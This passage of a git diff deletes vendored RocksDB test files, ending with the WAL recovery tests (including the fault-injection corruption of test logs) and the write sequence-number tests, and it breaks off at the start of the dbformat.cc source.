-  CreateAndReopenWithCF({"pikachu", "dobrynia", "nikitich"}, options);
-
-  // Since we will reopen DB with smaller write_buffer_size,
-  // each key will go to new SST file
-  ASSERT_OK(Put(1, Key(10), DummyString(1000000)));
-  ASSERT_OK(Put(1, Key(10), DummyString(1000000)));
-  ASSERT_OK(Put(1, Key(10), DummyString(1000000)));
-  ASSERT_OK(Put(1, Key(10), DummyString(1000000)));
-
-  ASSERT_OK(Put(3, Key(10), DummyString(1)));
-  // Make 'dobrynia' to be flushed and new WAL file to be created
-  ASSERT_OK(Put(2, Key(10), DummyString(7500000)));
-  ASSERT_OK(Put(2, Key(1), DummyString(1)));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[2]);
-  {
-    auto tables = ListTableFiles(env_, dbname_);
-    ASSERT_EQ(tables.size(), static_cast<size_t>(1));
-    // Make sure 'dobrynia' was flushed: check sst files amount
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(1));
-  }
-  // New WAL file
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(3, Key(10), DummyString(1)));
-  ASSERT_OK(Put(3, Key(10), DummyString(1)));
-  ASSERT_OK(Put(3, Key(10), DummyString(1)));
-
-  options.write_buffer_size = 4096;
-  options.arena_block_size = 4096;
-  ReopenWithColumnFamilies({"default", "pikachu", "dobrynia", "nikitich"},
-                           options);
-  {
-    // No inserts => default is empty
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(0));
-    // First 4 keys goes to separate SSTs + 1 more SST for 2 smaller keys
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(5));
-    // 1 SST for big key + 1 SST for small one
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(2));
-    // 1 SST for all keys
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(1));
-  }
-}
-
-// In https://reviews.facebook.net/D20661 we change
-// recovery behavior: previously for each log file each column family
-// memtable was flushed, even it wasn't empty. Now it's changed:
-// we try to create the smallest number of table files by merging
-// updates from multiple logs
-TEST_F(DBWALTest, RecoverCheckFileAmount) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000;
-  options.arena_block_size = 4 * 1024;
-  options.avoid_flush_during_recovery = false;
-  CreateAndReopenWithCF({"pikachu", "dobrynia", "nikitich"}, options);
-
-  ASSERT_OK(Put(0, Key(1), DummyString(1)));
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(2, Key(1), DummyString(1)));
-
-  // Make 'nikitich' memtable to be flushed
-  ASSERT_OK(Put(3, Key(10), DummyString(1002400)));
-  ASSERT_OK(Put(3, Key(1), DummyString(1)));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[3]);
-  // 4 memtable are not flushed, 1 sst file
-  {
-    auto tables = ListTableFiles(env_, dbname_);
-    ASSERT_EQ(tables.size(), static_cast<size_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(1));
-  }
-  // Memtable for 'nikitich' has flushed, new WAL file has opened
-  // 4 memtable still not flushed
-
-  // Write to new WAL file
-  ASSERT_OK(Put(0, Key(1), DummyString(1)));
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(2, Key(1), DummyString(1)));
-
-  // Fill up 'nikitich' one more time
-  ASSERT_OK(Put(3, Key(10), DummyString(1002400)));
-  // make it flush
-  ASSERT_OK(Put(3, Key(1), DummyString(1)));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[3]);
-  // There are still 4 memtable not flushed, and 2 sst tables
-  ASSERT_OK(Put(0, Key(1), DummyString(1)));
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(2, Key(1), DummyString(1)));
-
-  {
-    auto tables = ListTableFiles(env_, dbname_);
-    ASSERT_EQ(tables.size(), static_cast<size_t>(2));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-
-  ReopenWithColumnFamilies({"default", "pikachu", "dobrynia", "nikitich"},
-                           options);
-  {
-    std::vector<uint64_t> table_files = ListTableFiles(env_, dbname_);
-    // Check, that records for 'default', 'dobrynia' and 'pikachu' from
-    // first, second and third WALs  went to the same SST.
-    // So, there is 6 SSTs: three  for 'nikitich', one for 'default', one for
-    // 'dobrynia', one for 'pikachu'
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(3));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(1));
-  }
-}
-
-TEST_F(DBWALTest, SyncMultipleLogs) {
-  const uint64_t kNumBatches = 2;
-  const int kBatchSize = 1000;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.write_buffer_size = 4096;
-  Reopen(options);
-
-  WriteBatch batch;
-  WriteOptions wo;
-  wo.sync = true;
-
-  for (uint64_t b = 0; b < kNumBatches; b++) {
-    batch.Clear();
-    for (int i = 0; i < kBatchSize; i++) {
-      batch.Put(Key(i), DummyString(128));
-    }
-
-    dbfull()->Write(wo, &batch);
-  }
-
-  ASSERT_OK(dbfull()->SyncWAL());
-}
-
-// Github issue 1339. Prior the fix we read sequence id from the first log to
-// a local variable, then keep increase the variable as we replay logs,
-// ignoring actual sequence id of the records. This is incorrect if some writes
-// come with WAL disabled.
-TEST_F(DBWALTest, PartOfWritesWithWALDisabled) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_env(
-      new FaultInjectionTestEnv(env_));
-  Options options = CurrentOptions();
-  options.env = fault_env.get();
-  options.disable_auto_compactions = true;
-  WriteOptions wal_on, wal_off;
-  wal_on.sync = true;
-  wal_on.disableWAL = false;
-  wal_off.disableWAL = true;
-  CreateAndReopenWithCF({"dummy"}, options);
-  ASSERT_OK(Put(1, "dummy", "d1", wal_on));  // seq id 1
-  ASSERT_OK(Put(1, "dummy", "d2", wal_off));
-  ASSERT_OK(Put(1, "dummy", "d3", wal_off));
-  ASSERT_OK(Put(0, "key", "v4", wal_on));  // seq id 4
-  ASSERT_OK(Flush(0));
-  ASSERT_OK(Put(0, "key", "v5", wal_on));  // seq id 5
-  ASSERT_EQ("v5", Get(0, "key"));
-  dbfull()->FlushWAL(false);
-  // Simulate a crash.
-  fault_env->SetFilesystemActive(false);
-  Close();
-  fault_env->ResetState();
-  ReopenWithColumnFamilies({"default", "dummy"}, options);
-  // Prior to the fix, we may incorrectly recover "v5" with sequence id = 3.
-  ASSERT_EQ("v5", Get(0, "key"));
-  // Destroy DB before destruct fault_env.
-  Destroy(options);
-}
-
-//
-// Test WAL recovery for the various modes available
-//
-class RecoveryTestHelper {
- public:
-  // Number of WAL files to generate
-  static const int kWALFilesCount = 10;
-  // Starting number for the WAL file name like 00010.log
-  static const int kWALFileOffset = 10;
-  // Keys to be written per WAL file
-  static const int kKeysPerWALFile = 133;
-  // Size of the value
-  static const int kValueSize = 96;
-
-  // Create WAL files with values filled in
-  static void FillData(DBWALTest* test, const Options& options,
-                       const size_t wal_count, size_t* count) {
-    const ImmutableDBOptions db_options(options);
-
-    *count = 0;
-
-    shared_ptr<Cache> table_cache = NewLRUCache(50, 0);
-    EnvOptions env_options;
-    WriteBufferManager write_buffer_manager(db_options.db_write_buffer_size);
-
-    unique_ptr<VersionSet> versions;
-    unique_ptr<WalManager> wal_manager;
-    WriteController write_controller;
-
-    versions.reset(new VersionSet(test->dbname_, &db_options, env_options,
-                                  table_cache.get(), &write_buffer_manager,
-                                  &write_controller));
-
-    wal_manager.reset(new WalManager(db_options, env_options));
-
-    std::unique_ptr<log::Writer> current_log_writer;
-
-    for (size_t j = kWALFileOffset; j < wal_count + kWALFileOffset; j++) {
-      uint64_t current_log_number = j;
-      std::string fname = LogFileName(test->dbname_, current_log_number);
-      unique_ptr<WritableFile> file;
-      ASSERT_OK(db_options.env->NewWritableFile(fname, &file, env_options));
-      unique_ptr<WritableFileWriter> file_writer(
-          new WritableFileWriter(std::move(file), env_options));
-      current_log_writer.reset(
-          new log::Writer(std::move(file_writer), current_log_number,
-                          db_options.recycle_log_file_num > 0));
-
-      WriteBatch batch;
-      for (int i = 0; i < kKeysPerWALFile; i++) {
-        std::string key = "key" + ToString((*count)++);
-        std::string value = test->DummyString(kValueSize);
-        assert(current_log_writer.get() != nullptr);
-        uint64_t seq = versions->LastSequence() + 1;
-        batch.Clear();
-        batch.Put(key, value);
-        WriteBatchInternal::SetSequence(&batch, seq);
-        current_log_writer->AddRecord(WriteBatchInternal::Contents(&batch));
-        versions->SetLastToBeWrittenSequence(seq);
-        versions->SetLastSequence(seq);
-      }
-    }
-  }
-
-  // Recreate and fill the store with some data
-  static size_t FillData(DBWALTest* test, Options* options) {
-    options->create_if_missing = true;
-    test->DestroyAndReopen(*options);
-    test->Close();
-
-    size_t count = 0;
-    FillData(test, *options, kWALFilesCount, &count);
-    return count;
-  }
-
-  // Read back all the keys we wrote and return the number of keys found
-  static size_t GetData(DBWALTest* test) {
-    size_t count = 0;
-    for (size_t i = 0; i < kWALFilesCount * kKeysPerWALFile; i++) {
-      if (test->Get("key" + ToString(i)) != "NOT_FOUND") {
-        ++count;
-      }
-    }
-    return count;
-  }
-
-  // Manuall corrupt the specified WAL
-  static void CorruptWAL(DBWALTest* test, const Options& options,
-                         const double off, const double len,
-                         const int wal_file_id, const bool trunc = false) {
-    Env* env = options.env;
-    std::string fname = LogFileName(test->dbname_, wal_file_id);
-    uint64_t size;
-    ASSERT_OK(env->GetFileSize(fname, &size));
-    ASSERT_GT(size, 0);
-#ifdef OS_WIN
-    // Windows disk cache behaves differently. When we truncate
-    // the original content is still in the cache due to the original
-    // handle is still open. Generally, in Windows, one prohibits
-    // shared access to files and it is not needed for WAL but we allow
-    // it to induce corruption at various tests.
-    test->Close();
-#endif
-    if (trunc) {
-      ASSERT_EQ(0, truncate(fname.c_str(), static_cast<int64_t>(size * off)));
-    } else {
-      InduceCorruption(fname, static_cast<size_t>(size * off + 8),
-                       static_cast<size_t>(size * len));
-    }
-  }
-
-  // Overwrite data with 'a' from offset for length len
-  static void InduceCorruption(const std::string& filename, size_t offset,
-                               size_t len) {
-    ASSERT_GT(len, 0U);
-
-    int fd = open(filename.c_str(), O_RDWR);
-
-    // On windows long is 32-bit
-    ASSERT_LE(offset, std::numeric_limits<long>::max());
-
-    ASSERT_GT(fd, 0);
-    ASSERT_EQ(offset, lseek(fd, static_cast<long>(offset), SEEK_SET));
-
-    void* buf = alloca(len);
-    memset(buf, 'b', len);
-    ASSERT_EQ(len, write(fd, buf, static_cast<unsigned int>(len)));
-
-    close(fd);
-  }
-};
-
-// Test scope:
-// - We expect to open the data store when there is incomplete trailing writes
-// at the end of any of the logs
-// - We do not expect to open the data store for corruption
-TEST_F(DBWALTest, kTolerateCorruptedTailRecords) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-
-  for (auto trunc : {true, false}) {        /* Corruption style */
-    for (int i = 0; i < 3; i++) {           /* Corruption offset position */
-      for (int j = jstart; j < jend; j++) { /* WAL file */
-        // Fill data for testing
-        Options options = CurrentOptions();
-        const size_t row_count = RecoveryTestHelper::FillData(this, &options);
-        // test checksum failure or parsing
-        RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                       /*len%=*/.1, /*wal=*/j, trunc);
-
-        if (trunc) {
-          options.wal_recovery_mode =
-              WALRecoveryMode::kTolerateCorruptedTailRecords;
-          options.create_if_missing = false;
-          ASSERT_OK(TryReopen(options));
-          const size_t recovered_row_count = RecoveryTestHelper::GetData(this);
-          ASSERT_TRUE(i == 0 || recovered_row_count > 0);
-          ASSERT_LT(recovered_row_count, row_count);
-        } else {
-          options.wal_recovery_mode =
-              WALRecoveryMode::kTolerateCorruptedTailRecords;
-          ASSERT_NOK(TryReopen(options));
-        }
-      }
-    }
-  }
-}
-
-// Test scope:
-// We don't expect the data store to be opened if there is any corruption
-// (leading, middle or trailing -- incomplete writes or corruption)
-TEST_F(DBWALTest, kAbsoluteConsistency) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-
-  // Verify clean slate behavior
-  Options options = CurrentOptions();
-  const size_t row_count = RecoveryTestHelper::FillData(this, &options);
-  options.wal_recovery_mode = WALRecoveryMode::kAbsoluteConsistency;
-  options.create_if_missing = false;
-  ASSERT_OK(TryReopen(options));
-  ASSERT_EQ(RecoveryTestHelper::GetData(this), row_count);
-
-  for (auto trunc : {true, false}) { /* Corruption style */
-    for (int i = 0; i < 4; i++) {    /* Corruption offset position */
-      if (trunc && i == 0) {
-        continue;
-      }
-
-      for (int j = jstart; j < jend; j++) { /* wal files */
-        // fill with new date
-        RecoveryTestHelper::FillData(this, &options);
-        // corrupt the wal
-        RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                       /*len%=*/.1, j, trunc);
-        // verify
-        options.wal_recovery_mode = WALRecoveryMode::kAbsoluteConsistency;
-        options.create_if_missing = false;
-        ASSERT_NOK(TryReopen(options));
-      }
-    }
-  }
-}
-
-// Test scope:
-// - We expect to open data store under all circumstances
-// - We expect only data upto the point where the first error was encountered
-TEST_F(DBWALTest, kPointInTimeRecovery) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-  const int maxkeys =
-      RecoveryTestHelper::kWALFilesCount * RecoveryTestHelper::kKeysPerWALFile;
-
-  for (auto trunc : {true, false}) {        /* Corruption style */
-    for (int i = 0; i < 4; i++) {           /* Offset of corruption */
-      for (int j = jstart; j < jend; j++) { /* WAL file */
-        // Fill data for testing
-        Options options = CurrentOptions();
-        const size_t row_count = RecoveryTestHelper::FillData(this, &options);
-
-        // Corrupt the wal
-        RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                       /*len%=*/.1, j, trunc);
-
-        // Verify
-        options.wal_recovery_mode = WALRecoveryMode::kPointInTimeRecovery;
-        options.create_if_missing = false;
-        ASSERT_OK(TryReopen(options));
-
-        // Probe data for invariants
-        size_t recovered_row_count = RecoveryTestHelper::GetData(this);
-        ASSERT_LT(recovered_row_count, row_count);
-
-        bool expect_data = true;
-        for (size_t k = 0; k < maxkeys; ++k) {
-          bool found = Get("key" + ToString(i)) != "NOT_FOUND";
-          if (expect_data && !found) {
-            expect_data = false;
-          }
-          ASSERT_EQ(found, expect_data);
-        }
-
-        const size_t min = RecoveryTestHelper::kKeysPerWALFile *
-                           (j - RecoveryTestHelper::kWALFileOffset);
-        ASSERT_GE(recovered_row_count, min);
-        if (!trunc && i != 0) {
-          const size_t max = RecoveryTestHelper::kKeysPerWALFile *
-                             (j - RecoveryTestHelper::kWALFileOffset + 1);
-          ASSERT_LE(recovered_row_count, max);
-        }
-      }
-    }
-  }
-}
-
-// Test scope:
-// - We expect to open the data store under all scenarios
-// - We expect to have recovered records past the corruption zone
-TEST_F(DBWALTest, kSkipAnyCorruptedRecords) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-
-  for (auto trunc : {true, false}) {        /* Corruption style */
-    for (int i = 0; i < 4; i++) {           /* Corruption offset */
-      for (int j = jstart; j < jend; j++) { /* wal files */
-        // Fill data for testing
-        Options options = CurrentOptions();
-        const size_t row_count = RecoveryTestHelper::FillData(this, &options);
-
-        // Corrupt the WAL
-        RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                       /*len%=*/.1, j, trunc);
-
-        // Verify behavior
-        options.wal_recovery_mode = WALRecoveryMode::kSkipAnyCorruptedRecords;
-        options.create_if_missing = false;
-        ASSERT_OK(TryReopen(options));
-
-        // Probe data for invariants
-        size_t recovered_row_count = RecoveryTestHelper::GetData(this);
-        ASSERT_LT(recovered_row_count, row_count);
-
-        if (!trunc) {
-          ASSERT_TRUE(i != 0 || recovered_row_count > 0);
-        }
-      }
-    }
-  }
-}
-
-TEST_F(DBWALTest, AvoidFlushDuringRecovery) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.avoid_flush_during_recovery = false;
-
-  // Test with flush after recovery.
-  Reopen(options);
-  ASSERT_OK(Put("foo", "v1"));
-  ASSERT_OK(Put("bar", "v2"));
-  ASSERT_OK(Flush());
-  ASSERT_OK(Put("foo", "v3"));
-  ASSERT_OK(Put("bar", "v4"));
-  ASSERT_EQ(1, TotalTableFiles());
-  // Reopen DB. Check if WAL logs flushed.
-  Reopen(options);
-  ASSERT_EQ("v3", Get("foo"));
-  ASSERT_EQ("v4", Get("bar"));
-  ASSERT_EQ(2, TotalTableFiles());
-
-  // Test without flush after recovery.
-  options.avoid_flush_during_recovery = true;
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("foo", "v5"));
-  ASSERT_OK(Put("bar", "v6"));
-  ASSERT_OK(Flush());
-  ASSERT_OK(Put("foo", "v7"));
-  ASSERT_OK(Put("bar", "v8"));
-  ASSERT_EQ(1, TotalTableFiles());
-  // Reopen DB. WAL logs should not be flushed this time.
-  Reopen(options);
-  ASSERT_EQ("v7", Get("foo"));
-  ASSERT_EQ("v8", Get("bar"));
-  ASSERT_EQ(1, TotalTableFiles());
-
-  // Force flush with allow_2pc.
-  options.avoid_flush_during_recovery = true;
-  options.allow_2pc = true;
-  ASSERT_OK(Put("foo", "v9"));
-  ASSERT_OK(Put("bar", "v10"));
-  ASSERT_OK(Flush());
-  ASSERT_OK(Put("foo", "v11"));
-  ASSERT_OK(Put("bar", "v12"));
-  Reopen(options);
-  ASSERT_EQ("v11", Get("foo"));
-  ASSERT_EQ("v12", Get("bar"));
-  ASSERT_EQ(2, TotalTableFiles());
-}
-
-TEST_F(DBWALTest, WalCleanupAfterAvoidFlushDuringRecovery) {
-  // Verifies WAL files that were present during recovery, but not flushed due
-  // to avoid_flush_during_recovery, will be considered for deletion at a later
-  // stage. We check at least one such file is deleted during Flush().
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.avoid_flush_during_recovery = true;
-  Reopen(options);
-
-  ASSERT_OK(Put("foo", "v1"));
-  Reopen(options);
-  for (int i = 0; i < 2; ++i) {
-    if (i > 0) {
-      // Flush() triggers deletion of obsolete tracked files
-      Flush();
-    }
-    VectorLogPtr log_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-    if (i == 0) {
-      ASSERT_GT(log_files.size(), 0);
-    } else {
-      ASSERT_EQ(0, log_files.size());
-    }
-  }
-}
-
-TEST_F(DBWALTest, RecoverWithoutFlush) {
-  Options options = CurrentOptions();
-  options.avoid_flush_during_recovery = true;
-  options.create_if_missing = false;
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 64 * 1024 * 1024;
-
-  size_t count = RecoveryTestHelper::FillData(this, &options);
-  auto validateData = [this, count]() {
-    for (size_t i = 0; i < count; i++) {
-      ASSERT_NE(Get("key" + ToString(i)), "NOT_FOUND");
-    }
-  };
-  Reopen(options);
-  validateData();
-  // Insert some data without flush
-  ASSERT_OK(Put("foo", "foo_v1"));
-  ASSERT_OK(Put("bar", "bar_v1"));
-  Reopen(options);
-  validateData();
-  ASSERT_EQ(Get("foo"), "foo_v1");
-  ASSERT_EQ(Get("bar"), "bar_v1");
-  // Insert again and reopen
-  ASSERT_OK(Put("foo", "foo_v2"));
-  ASSERT_OK(Put("bar", "bar_v2"));
-  Reopen(options);
-  validateData();
-  ASSERT_EQ(Get("foo"), "foo_v2");
-  ASSERT_EQ(Get("bar"), "bar_v2");
-  // manual flush and insert again
-  Flush();
-  ASSERT_EQ(Get("foo"), "foo_v2");
-  ASSERT_EQ(Get("bar"), "bar_v2");
-  ASSERT_OK(Put("foo", "foo_v3"));
-  ASSERT_OK(Put("bar", "bar_v3"));
-  Reopen(options);
-  validateData();
-  ASSERT_EQ(Get("foo"), "foo_v3");
-  ASSERT_EQ(Get("bar"), "bar_v3");
-}
-
-TEST_F(DBWALTest, RecoverWithoutFlushMultipleCF) {
-  const std::string kSmallValue = "v";
-  const std::string kLargeValue = DummyString(1024);
-  Options options = CurrentOptions();
-  options.avoid_flush_during_recovery = true;
-  options.create_if_missing = false;
-  options.disable_auto_compactions = true;
-
-  auto countWalFiles = [this]() {
-    VectorLogPtr log_files;
-    dbfull()->GetSortedWalFiles(log_files);
-    return log_files.size();
-  };
-
-  // Create DB with multiple column families and multiple log files.
-  CreateAndReopenWithCF({"one", "two"}, options);
-  ASSERT_OK(Put(0, "key1", kSmallValue));
-  ASSERT_OK(Put(1, "key2", kLargeValue));
-  Flush(1);
-  ASSERT_EQ(1, countWalFiles());
-  ASSERT_OK(Put(0, "key3", kSmallValue));
-  ASSERT_OK(Put(2, "key4", kLargeValue));
-  Flush(2);
-  ASSERT_EQ(2, countWalFiles());
-
-  // Reopen, insert and flush.
-  options.db_write_buffer_size = 64 * 1024 * 1024;
-  ReopenWithColumnFamilies({"default", "one", "two"}, options);
-  ASSERT_EQ(Get(0, "key1"), kSmallValue);
-  ASSERT_EQ(Get(1, "key2"), kLargeValue);
-  ASSERT_EQ(Get(0, "key3"), kSmallValue);
-  ASSERT_EQ(Get(2, "key4"), kLargeValue);
-  // Insert more data.
-  ASSERT_OK(Put(0, "key5", kLargeValue));
-  ASSERT_OK(Put(1, "key6", kLargeValue));
-  ASSERT_EQ(3, countWalFiles());
-  Flush(1);
-  ASSERT_OK(Put(2, "key7", kLargeValue));
-  dbfull()->FlushWAL(false);
-  ASSERT_EQ(4, countWalFiles());
-
-  // Reopen twice and validate.
-  for (int i = 0; i < 2; i++) {
-    ReopenWithColumnFamilies({"default", "one", "two"}, options);
-    ASSERT_EQ(Get(0, "key1"), kSmallValue);
-    ASSERT_EQ(Get(1, "key2"), kLargeValue);
-    ASSERT_EQ(Get(0, "key3"), kSmallValue);
-    ASSERT_EQ(Get(2, "key4"), kLargeValue);
-    ASSERT_EQ(Get(0, "key5"), kLargeValue);
-    ASSERT_EQ(Get(1, "key6"), kLargeValue);
-    ASSERT_EQ(Get(2, "key7"), kLargeValue);
-    ASSERT_EQ(4, countWalFiles());
-  }
-}
-
-// In this test we are trying to do the following:
-//   1. Create a DB with corrupted WAL log;
-//   2. Open with avoid_flush_during_recovery = true;
-//   3. Append more data without flushing, which creates new WAL log.
-//   4. Open again. See if it can correctly handle previous corruption.
-TEST_F(DBWALTest, RecoverFromCorruptedWALWithoutFlush) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-  const int kAppendKeys = 100;
-  Options options = CurrentOptions();
-  options.avoid_flush_during_recovery = true;
-  options.create_if_missing = false;
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 64 * 1024 * 1024;
-
-  auto getAll = [this]() {
-    std::vector<std::pair<std::string, std::string>> data;
-    ReadOptions ropt;
-    Iterator* iter = dbfull()->NewIterator(ropt);
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      data.push_back(
-          std::make_pair(iter->key().ToString(), iter->value().ToString()));
-    }
-    delete iter;
-    return data;
-  };
-  for (auto& mode : wal_recovery_mode_string_map) {
-    options.wal_recovery_mode = mode.second;
-    for (auto trunc : {true, false}) {
-      for (int i = 0; i < 4; i++) {
-        for (int j = jstart; j < jend; j++) {
-          // Create corrupted WAL
-          RecoveryTestHelper::FillData(this, &options);
-          RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                         /*len%=*/.1, /*wal=*/j, trunc);
-          // Skip the test if DB won't open.
-          if (!TryReopen(options).ok()) {
-            ASSERT_TRUE(options.wal_recovery_mode ==
-                            WALRecoveryMode::kAbsoluteConsistency ||
-                        (!trunc &&
-                         options.wal_recovery_mode ==
-                             WALRecoveryMode::kTolerateCorruptedTailRecords));
-            continue;
-          }
-          ASSERT_OK(TryReopen(options));
-          // Append some more data.
-          for (int k = 0; k < kAppendKeys; k++) {
-            std::string key = "extra_key" + ToString(k);
-            std::string value = DummyString(RecoveryTestHelper::kValueSize);
-            ASSERT_OK(Put(key, value));
-          }
-          // Save data for comparison.
-          auto data = getAll();
-          // Reopen. Verify data.
-          ASSERT_OK(TryReopen(options));
-          auto actual_data = getAll();
-          ASSERT_EQ(data, actual_data);
-        }
-      }
-    }
-  }
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBWALTest, WalTermTest) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-
-  WriteOptions wo;
-  wo.sync = true;
-  wo.disableWAL = false;
-
-  WriteBatch batch;
-  batch.Put("foo", "bar");
-  batch.MarkWalTerminationPoint();
-  batch.Put("foo2", "bar2");
-
-  ASSERT_OK(dbfull()->Write(wo, &batch));
-
-  // make sure we can re-open it.
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-  ASSERT_EQ("bar", Get(1, "foo"));
-  ASSERT_EQ("NOT_FOUND", Get(1, "foo2"));
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_write_test.cc b/thirdparty/rocksdb/db/db_write_test.cc
deleted file mode 100644
index 726f444..0000000
--- a/thirdparty/rocksdb/db/db_write_test.cc
+++ /dev/null
@@ -1,81 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-#include <thread>
-#include <vector>
-#include "db/db_test_util.h"
-#include "db/write_batch_internal.h"
-#include "port/stack_trace.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// Test variations of WriteImpl.
-class DBWriteTest : public DBTestBase, public testing::WithParamInterface<int> {
- public:
-  DBWriteTest() : DBTestBase("/db_write_test") {}
-
-  void Open() { DBTestBase::Reopen(GetOptions(GetParam())); }
-};
-
-// Sequence number should be return through input write batch.
-TEST_P(DBWriteTest, ReturnSeuqneceNumber) {
-  Random rnd(4422);
-  Open();
-  for (int i = 0; i < 100; i++) {
-    WriteBatch batch;
-    batch.Put("key" + ToString(i), test::RandomHumanReadableString(&rnd, 10));
-    ASSERT_OK(dbfull()->Write(WriteOptions(), &batch));
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(),
-              WriteBatchInternal::Sequence(&batch));
-  }
-}
-
-TEST_P(DBWriteTest, ReturnSeuqneceNumberMultiThreaded) {
-  constexpr size_t kThreads = 16;
-  constexpr size_t kNumKeys = 1000;
-  Open();
-  ASSERT_EQ(0, dbfull()->GetLatestSequenceNumber());
-  // Check each sequence is used once and only once.
-  std::vector<std::atomic_flag> flags(kNumKeys * kThreads + 1);
-  for (size_t i = 0; i < flags.size(); i++) {
-    flags[i].clear();
-  }
-  auto writer = [&](size_t id) {
-    Random rnd(4422 + static_cast<uint32_t>(id));
-    for (size_t k = 0; k < kNumKeys; k++) {
-      WriteBatch batch;
-      batch.Put("key" + ToString(id) + "-" + ToString(k),
-                test::RandomHumanReadableString(&rnd, 10));
-      ASSERT_OK(dbfull()->Write(WriteOptions(), &batch));
-      SequenceNumber sequence = WriteBatchInternal::Sequence(&batch);
-      ASSERT_GT(sequence, 0);
-      ASSERT_LE(sequence, kNumKeys * kThreads);
-      // The sequence isn't consumed by someone else.
-      ASSERT_FALSE(flags[sequence].test_and_set());
-    }
-  };
-  std::vector<port::Thread> threads;
-  for (size_t i = 0; i < kThreads; i++) {
-    threads.emplace_back(writer, i);
-  }
-  for (size_t i = 0; i < kThreads; i++) {
-    threads[i].join();
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(DBWriteTestInstance, DBWriteTest,
-                        testing::Values(DBTestBase::kDefault,
-                                        DBTestBase::kConcurrentWALWrites,
-                                        DBTestBase::kPipelinedWrite));
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/dbformat.cc b/thirdparty/rocksdb/db/dbformat.cc
deleted file mode 100644
index f287ae9..0000000
--- a/thirdparty/rocksdb/db/dbformat.cc
+++ /dev/null
@@ -1,177 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/dbformat.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <stdio.h>
